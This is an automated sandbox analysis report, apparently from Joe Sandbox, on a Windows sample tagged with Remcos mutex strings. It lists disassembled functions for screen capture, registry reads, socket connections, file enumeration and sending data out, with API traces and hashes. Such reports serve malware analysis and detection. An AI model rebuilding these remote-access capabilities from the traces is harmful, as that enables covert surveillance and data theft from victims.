                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$V01@@$?data@?$basic_string@$??0?$basic_string@$V01@$??4?$basic_string@$V?$basic_string@$?length@?$basic_string@G@2@@0@$G@1@@Hstd@@$CreateV10@$??8std@@?begin@?$basic_string@$??2@?size@?$basic_string@D@1@@D@2@@0@D@std@@@std@@Process32$?end@?$basic_string@?find@?$basic_string@A?$basic_string@CloseFileModuleMutexNameNextOpenThreadV12@atoifreemallocwcslen$??0?$basic_ofstream@??6std@@??9std@@?close@?$basic_ofstream@?substr@?$basic_string@AddressD?$basic_ofstream@D@std@@@0@DirectoryErrorExecuteFirstG@2@@0@0@HandleLastLibraryLoadObjectProcQueryShellSingleSnapshotToolhelp32V10@0@V10@@V?$basic_ostream@ValueWaitY?$basic_string@exitwcscmpwcscpy
                                                • String ID: (32 bit)$ (64 bit)$EXEpath$Inj$ProductName$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$licence_code.txt$origmsc$)A$)A
                                                • API String ID: 592530544-3120820120
                                                • Opcode ID: 1cefe9e0a91dd9e1432ac4b01f83a5a4e78eac758390e1c66c81268865004c83
                                                • Instruction ID: b42fcd4e3e42c807c67e9e1877a946166e14785ff057091880b336a728af36a3
                                                • Opcode Fuzzy Hash: 1cefe9e0a91dd9e1432ac4b01f83a5a4e78eac758390e1c66c81268865004c83
                                                • Instruction Fuzzy Hash: 81529171A00245AFDF057BB0AC5AAFE3B69AB40706F0444BEF502A72E1DE794E84875D
                                                Function 00411550 Relevance: 21.1, APIs: 14, Instructions: 85COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041155F
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411576
                                                • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C), ref: 0041158C
                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 004115AA
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115B4
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115BD
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115D2
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115DF
                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,6C995E04), ref: 004115F5
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115FF
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411608
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411631
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041163A
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411643
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$?length@?$basic_string@V12@$??4?$basic_string@?substr@?$basic_string@V01@V01@@$??0?$basic_string@?find@?$basic_string@D@1@@
                                                • String ID:
                                                • API String ID: 3435050692-0
                                                • Opcode ID: 823909bbf3c1aae78c3434f0519d02c6ffc47d267fe951e889c3075e40b2c626
                                                • Instruction ID: 78a9969333cb22ba367a08e3ec5b5c827793684ccd0837e4e48f6ac12532cdb2
                                                • Opcode Fuzzy Hash: 823909bbf3c1aae78c3434f0519d02c6ffc47d267fe951e889c3075e40b2c626
                                                • Instruction Fuzzy Hash: 65319B7550010EABCF04EFA1DD99CEE7B79FE55306B108169F516E31A0EB34AB09CB68
                                                Function 004128AF Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 258 4128af-412924 __set_app_type __p__fmode __p__commode call 412a3b 261 412932-412989 call 412a26 _initterm __getmainargs _initterm 258->261 262 412926-412931 __setusermatherr 258->262 265 4129c5-4129c8 261->265 266 41298b-412993 261->266 262->261 267 4129a2-4129a6 265->267 268 4129ca-4129ce 265->268 269 412995-412997 266->269 270 412999-41299c 266->270 272 4129a8-4129aa 267->272 273 4129ac-4129bd GetStartupInfoA 267->273 268->265 269->266 269->270 270->267 271 41299e-41299f 270->271 271->267 272->271 272->273 274 4129d0-4129d2 273->274 275 4129bf-4129c3 273->275 276 4129d3-412a00 GetModuleHandleA call 40845a exit _XcptFilter 274->276 275->276
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                • String ID:
                                                • API String ID: 801014965-0
                                                • Opcode ID: 6f84974f85084e5c0d59130a57f98c973d1d1ebc6fd8a7326c776f11e2f963a9
                                                • Instruction ID: 69795cd1a6f2df7106d2d63f2792c1373b97bfdac7ef65b590e4ef6b191c87fd
                                                • Opcode Fuzzy Hash: 6f84974f85084e5c0d59130a57f98c973d1d1ebc6fd8a7326c776f11e2f963a9
                                                • Instruction Fuzzy Hash: 08419CB0940308AFDB21DFA8D955AEABBB8FB09710F20412FF851D7291D7B84981CB5C
                                                Function 0040A825 Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 279 40a825-40a84c RegOpenKeyExA 280 40a87b-40a87e 279->280 281 40a84e-40a87a RegQueryValueExA RegCloseKey 279->281
                                                APIs
                                                • RegOpenKeyExA.KERNELBASE(80000001,00408685,00000000,00020019,00408685,?,?,?,00408685,80000001,00000000,?,?,?,?,0000000E), ref: 0040A844
                                                • RegQueryValueExA.KERNELBASE(00408685,?,00000000,80000001,?,00000000,00419BC8,?,?,?,00408685,80000001,00000000), ref: 0040A862
                                                • RegCloseKey.KERNELBASE(00408685,?,?,?,00408685,80000001,00000000,?,?,?,?,0000000E,00413764), ref: 0040A86D
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID:
                                                • API String ID: 3677997916-0
                                                • Opcode ID: 65079a657e34e65014708f5f8436535861bd0cd87b08d12a9c0fe70b4f0a8459
                                                • Instruction ID: da08f03aed7bc9e493084d81934a8d7b0b900bd5ee8b69f4dd8cb0e5919d82df
                                                • Opcode Fuzzy Hash: 65079a657e34e65014708f5f8436535861bd0cd87b08d12a9c0fe70b4f0a8459
                                                • Instruction Fuzzy Hash: BBF0F976900218BFDF119F90DD09FDA7FB9EB08760F108165BA05EA190E271DA10AB94

                                                Non-executed Functions

                                                Function 0040F0DF Relevance: 91.3, APIs: 51, Strings: 1, Instructions: 298windowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 783 40f0df-40f12f CreateDCA CreateCompatibleDC GetDeviceCaps * 2 CreateCompatibleBitmap 784 40f131-40f149 DeleteDC * 2 DeleteObject 783->784 785 40f14e-40f15a SelectObject 783->785 786 40f35e-40f36d ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z 784->786 787 40f17b-40f198 StretchBlt 785->787 788 40f15c-40f176 DeleteDC * 2 DeleteObject 785->788 789 40f446-40f44d 786->789 790 40f1b9-40f1c2 787->790 791 40f19a-40f1b4 DeleteDC * 2 DeleteObject 787->791 788->786 792 40f1c4-40f1d7 GetCursorInfo 790->792 793 40f20e-40f221 GetObjectA 790->793 791->786 792->793 794 40f1d9-40f1e8 GetIconInfo 792->794 795 40f240-40f24d 793->795 796 40f223-40f23b DeleteDC * 2 DeleteObject 793->796 794->793 797 40f1ea-40f208 DeleteObject * 2 DrawIcon 794->797 798 40f257-40f25d 795->798 799 40f24f-40f252 795->799 796->786 797->793 801 40f267-40f26d 798->801 802 40f25f-40f262 798->802 800 40f312-40f31f 799->800 803 40f285-40f2b8 LocalAlloc 800->803 801->802 804 40f26f-40f275 801->804 802->800 806 40f2c2-40f2ef GlobalAlloc 803->806 807 40f2ba-40f2bf 803->807 804->802 805 40f277-40f27a 804->805 810 40f280-40f283 805->810 811 40f30b 805->811 808 40f2f1-40f309 DeleteDC * 2 DeleteObject 806->808 809 40f324-40f33b GetDIBits 806->809 807->806 808->786 812 40f372-40f440 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z * 2 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z DeleteObject GlobalFree DeleteDC * 2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 809->812 813 40f33d-40f35b DeleteDC * 2 DeleteObject GlobalFree 809->813 810->803 811->800 812->789 813->786
                                                APIs
                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040F0F5
                                                • CreateCompatibleDC.GDI32(00000000), ref: 0040F101
                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040F113
                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040F11B
                                                • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 0040F124
                                                • DeleteDC.GDI32(00000000), ref: 0040F138
                                                • DeleteDC.GDI32(?), ref: 0040F13D
                                                • DeleteObject.GDI32(00000000), ref: 0040F140
                                                • SelectObject.GDI32(?,00000000), ref: 0040F152
                                                • DeleteDC.GDI32(00000000), ref: 0040F163
                                                • DeleteDC.GDI32(?), ref: 0040F168
                                                • DeleteObject.GDI32(?), ref: 0040F16D
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413670,?), ref: 0040F367
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040F3A5
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040F3B2
                                                • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00004D42,0000000E), ref: 0040F3C1
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040F3CE
                                                • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00000000,00000028), ref: 0040F3DA
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040F3E7
                                                • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,?), ref: 0040F3F6
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040F403
                                                • DeleteObject.GDI32(?), ref: 0040F40C
                                                • GlobalFree.KERNEL32(?), ref: 0040F411
                                                • DeleteDC.GDI32(0040FAAF), ref: 0040F420
                                                • DeleteDC.GDI32(?), ref: 0040F425
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040F42E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F437
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F440
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$Delete$??0?$basic_string@ObjectV01@@$?assign@?$basic_string@CreateD@1@@V01@V12@Y?$basic_string@$??1?$basic_string@CapsCompatibleDevice$BitmapFreeGlobalSelect
                                                • String ID: DISPLAY
                                                • API String ID: 1547359654-865373369
                                                • Opcode ID: e6f52bb77814987d907f30b8aba8f7c2e7e7ea048236d7eec96aba4660ee2b0e
                                                • Instruction ID: 69fc59073b9f6dc180b1a6ec743b06990735fda19b09251324fd81747437f5bc
                                                • Opcode Fuzzy Hash: e6f52bb77814987d907f30b8aba8f7c2e7e7ea048236d7eec96aba4660ee2b0e
                                                • Instruction Fuzzy Hash: 62B1F575900119EFCF20EFA0DC489EEBBB9FF48715B10807AE905A7260DB35AA49DF54
                                                Function 00403AC1 Relevance: 88.8, APIs: 59, Instructions: 322filenetworkthreadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 814 403ac1-403b0c call 412850 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z socket connect 817 403b12-403b66 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z * 2 call 4023c0 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 814->817 818 403f17-403f41 _CxxThrowException ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ atoi call 4041ea FindClose ExitThread 814->818 823 403b83-403bf0 ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ call 4043bc ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ FindFirstFileW ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ 817->823 824 403b68-403b7e _CxxThrowException 817->824 827 403c30-403c42 FindNextFileW 823->827 828 403bf2-403c2b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z call 4023c0 _CxxThrowException 823->828 824->823 830 403e75-403f14 FindClose ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z * 2 call 4023c0 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ atoi call 4041ea ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 2 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 827->830 831 403c48-403c4f 827->831 828->827 833 403c55-403c6d wcscmp 831->833 834 403d39-403da2 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ call 4043bc ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z 831->834 833->834 837 403c73-403c85 wcscmp 833->837 843 403e64-403e70 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ 834->843 844 403da8-403e47 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ call 4113ba ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z * 2 call 4023c0 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 834->844 837->834 840 403c8b-403d10 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ * 2 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z * 2 call 403f4d 837->840 848 403d12-403d28 _CxxThrowException 840->848 849 403d2d-403d33 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ 840->849 843->827 844->843 853 403e49-403e5f _CxxThrowException 844->853 848->849 849->834 853->843
                                                APIs
                                                • __EH_prolog.LIBCMT ref: 00403AC6
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00403AE3
                                                • socket.WS2_32(00000000,00000001,00000006), ref: 00403AF6
                                                • connect.WS2_32(00000000,00419298,00000010), ref: 00403B05
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00419288,?,00000006), ref: 00403B2E
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,00000006), ref: 00403B38
                                                  • Part of subcall function 004023C0: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60([INFO],?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023CA
                                                  • Part of subcall function 004023C0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023E3
                                                  • Part of subcall function 004023C0: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023EE
                                                  • Part of subcall function 004023C0: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023FB
                                                  • Part of subcall function 004023C0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 0040240D
                                                  • Part of subcall function 004023C0: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402418
                                                  • Part of subcall function 004023C0: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402427
                                                  • Part of subcall function 004023C0: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402431
                                                  • Part of subcall function 004023C0: send.WS2_32(?,00000000), ref: 0040243B
                                                  • Part of subcall function 004023C0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402492
                                                  • Part of subcall function 004023C0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 0040249B
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000006), ref: 00403B5E
                                                • _CxxThrowException.MSVCRT(00000001,00414F18), ref: 00403B7E
                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000006), ref: 00403B8C
                                                • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000006), ref: 00403B96
                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000006), ref: 00403BA0
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,00413894,?), ref: 00403BC6
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 00403BD0
                                                • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00403BD7
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00403BE6
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413670,?), ref: 00403C05
                                                • _CxxThrowException.MSVCRT(00000002,00414F18), ref: 00403C2B
                                                • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00403C3A
                                                • wcscmp.MSVCRT ref: 00403C67
                                                • wcscmp.MSVCRT ref: 00403C7F
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00413888), ref: 00403CA4
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000), ref: 00403CB6
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00403CC6
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00403CD4
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00403CE0
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00403CEF
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00403D01
                                                  • Part of subcall function 00403F4D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00403F62
                                                  • Part of subcall function 00403F4D: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(76322A40), ref: 00403F72
                                                  • Part of subcall function 00403F4D: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00403F7C
                                                  • Part of subcall function 00403F4D: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00403F86
                                                  • Part of subcall function 00403F4D: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,00413894,?), ref: 00403FA9
